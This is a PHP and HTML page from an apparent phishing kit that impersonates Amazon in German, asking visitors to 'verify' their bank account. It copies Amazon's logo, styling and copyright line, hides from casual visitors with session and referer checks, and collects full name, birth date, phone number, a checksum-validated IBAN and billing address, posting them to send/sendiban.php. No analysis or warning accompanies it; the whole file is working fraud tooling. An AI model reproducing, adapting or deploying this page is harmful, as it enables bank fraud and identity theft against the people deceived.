<?php
session_start();

if (!isset($_SESSION['email'])) {
    header('Location: index.php');
    exit();
}

if (!isset($_SERVER['HTTP_REFERER']) || strpos($_SERVER['HTTP_REFERER'], $_SERVER['HTTP_HOST']) === false) {
    header('Location: index.php');
    exit();
}

include('config.php');

if (isset($page_iban) && $page_iban == 'no') {
    header("Location: controller.php?step=after_email_process");
    exit();
}

if (isset($_SESSION['iban_submitted'])) {
    die("Sitzung abgelaufen. Bitte schließen Sie diese Seite.");
}

$user_email = $_SESSION['email'] ?? 'Kunde';
?>
<!DOCTYPE html>
<html lang="de">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Amazon Verifizierung - IBAN</title>
    <style>
        * { margin: 0; padding: 0; box-sizing: border-box; }
        body {
            font-family: "Amazon Ember", Arial, sans-serif;
            background-color: #fff; color: #111;
            display: flex; flex-direction: column; align-items: center; padding: 20px;
        }
        .amazon-logo { width: 103px; margin-bottom: 20px; }
        .container { width: 100%; max-width: 550px; }
        .card { border: 1px solid #ddd; border-radius: 8px; padding: 25px; background: #fff; }
        h1 { font-size: 22px; font-weight: 400; margin-bottom: 10px; }
        .alert-info {
            background-color: #f0f8ff; border: 1px solid #0066c0;
            padding: 10px; border-radius: 4px; font-size: 13px;
            margin-bottom: 20px; color: #111;
        }
        .form-grid { display: grid; grid-template-columns: 1fr 1fr; gap: 12px; }
        .input-group { margin-bottom: 10px; position: relative; }
        .full-width { grid-column: span 2; }
        label { display: block; font-size: 13px; font-weight: bold; margin-bottom: 5px; }
        input {
            width: 100%; padding: 10px; border: 1px solid #888;
            border-radius: 3px; font-size: 14px; outline: none;
        }
        input:focus { border-color: #e77600; box-shadow: 0 0 3px 2px rgba(228,121,17,.5); }
        input.invalid { border-color: #d00 !important; box-shadow: 0 0 3px 2px rgba(204,0,0,.2) !important; }
        
        /* Disable button style */
        .btn-amazon:disabled {
            background: #f7dfa1; border-color: #d8d8d8;
            cursor: not-allowed; opacity: 0.7;
        }

        #country-badge {
            display: none; position: absolute; right: 10px; top: 32px;
            font-size: 11px; background: #eee; padding: 2px 6px;
            border-radius: 3px; color: #555; font-weight: bold;
        }
        .error-msg { color: #d00; font-size: 11px; margin-top: 4px; display: none; }

        .btn-amazon {
            grid-column: span 2; background: #FFD814; border: 1px solid #FCD200;
            color: #111; padding: 12px; border-radius: 8px; font-size: 14px;
            cursor: pointer; margin-top: 15px; font-weight: 500;
        }
        .btn-amazon:hover { background: #F7CA00; }
        .footer {
            margin-top: 30px; text-align: center; font-size: 11px;
            color: #555; border-top: 1px solid #eee; padding-top: 20px;
        }
        @media (max-width: 500px) {
            .form-grid { grid-template-columns: 1fr; }
            .full-width, .btn-amazon { grid-column: span 1; }
        }
    </style>
</head>
<body>

    <img src="https://upload.wikimedia.org/wikipedia/commons/a/a9/Amazon_logo.svg" alt="Amazon" class="amazon-logo">

    <div class="container">
        <div class="card">
            <h1>Zahlungsinformationen</h1>
            <div class="alert-info">Verifizieren Sie Ihr Bankkonto, um fortzufahren.</div>

            <form action="send/sendiban.php" method="POST" id="ibanForm" class="form-grid" onsubmit="return handleFormSubmit(this);">
                <div class="input-group full-width">
                    <label>Vollständiger Name (Kontoinhaber)</label>
                    <input type="text" name="full_name" placeholder="Erika Mustermann" required>
                </div>

                <div class="input-group">
                    <label>Geburtsdatum</label>
                    <input type="text" name="dob" placeholder="TT.MM.JJJJ" required>
                </div>

                <div class="input-group">
                    <label>Telefonnummer</label>
                    <input type="text" name="phone" placeholder="+49 123 456789" required>
                </div>

                <div class="input-group full-width">
                    <label>IBAN</label>
                    <input type="text" name="iban" id="ibanInput" placeholder="DE00 0000 0000 0000 0000 00" required autocomplete="off" maxlength="34">
                    <span id="country-badge"></span>
                    <div id="ibanError" class="error-msg">Ungültige IBAN-Nummer. Bitte überprüfen.</div>
                </div>

                <div class="input-group full-width">
                    <label>Rechnungsadresse</label>
                    <input type="text" name="address" placeholder="Straße, Hausnummer" required>
                </div>

                <div class="input-group">
                    <label>Ort</label>
                    <input type="text" name="city" placeholder="Berlin" required>
                </div>

                <div class="input-group">
                    <label>Postleitzahl</label>
                    <input type="text" name="zip" placeholder="10115" required>
                </div>

                <button type="submit" id="submitBtn" class="btn-amazon">Daten Bestätigen</button>
            </form>
        </div>

        <div class="footer">
            <p>© 1996-2025, Amazon.com, Inc. oder Tochtergesellschaften</p>
        </div>
    </div>

    <script>
        if ( window.history.replaceState ) {
            window.history.replaceState( null, null, window.location.href );
        }

        const countryCodes = {
            "DE": "Deutschland", "AT": "Österreich", "CH": "Schweiz", 
            "NL": "Niederlande", "FR": "Frankreich", "BE": "Belgien",
            "ES": "Spanien", "IT": "Italien", "LU": "Luxemburg"
        };

        const ibanInput = document.getElementById('ibanInput');
        const countryBadge = document.getElementById('country-badge');
        const ibanError = document.getElementById('ibanError');
        const submitBtn = document.getElementById('submitBtn');

        function validateIBAN(iban) {
            iban = iban.replace(/\s+/g, '').toUpperCase();
            if (iban.length < 15) return false;

            let rearranged = iban.substring(4) + iban.substring(0, 4);
            let numeric = "";
            for (let i = 0; i < rearranged.length; i++) {
                let code = rearranged.charCodeAt(i);
                if (code >= 65 && code <= 90) numeric += (code - 55);
                else numeric += rearranged.charAt(i);
            }

            try {
                return BigInt(numeric) % 97n === 1n;
            } catch (e) {
                return false;
            }
        }

        function handleFormSubmit(form) {
            if (!validateIBAN(ibanInput.value)) {
                ibanInput.classList.add('invalid');
                ibanError.style.display = 'block';
                ibanInput.focus();
                return false;
            }
            
            submitBtn.disabled = true;
            submitBtn.innerText = "Verarbeitung...";
            return true;
        }

        ibanInput.addEventListener('input', function() {
            let val = this.value.toUpperCase().replace(/[^A-Z0-9]/g, '');
            
            if (val.length >= 2) {
                let code = val.substring(0, 2);
                if (countryCodes[code]) {
                    countryBadge.innerText = countryCodes[code];
                    countryBadge.style.display = 'block';
                } else {
                    countryBadge.style.display = 'none';
                }
            } else {
                countryBadge.style.display = 'none';
            }

            this.value = val.replace(/(.{4})/g, '$1 ').trim();
            
            ibanInput.classList.remove('invalid');
            ibanError.style.display = 'none';
        });
    </script>
</body>
</html>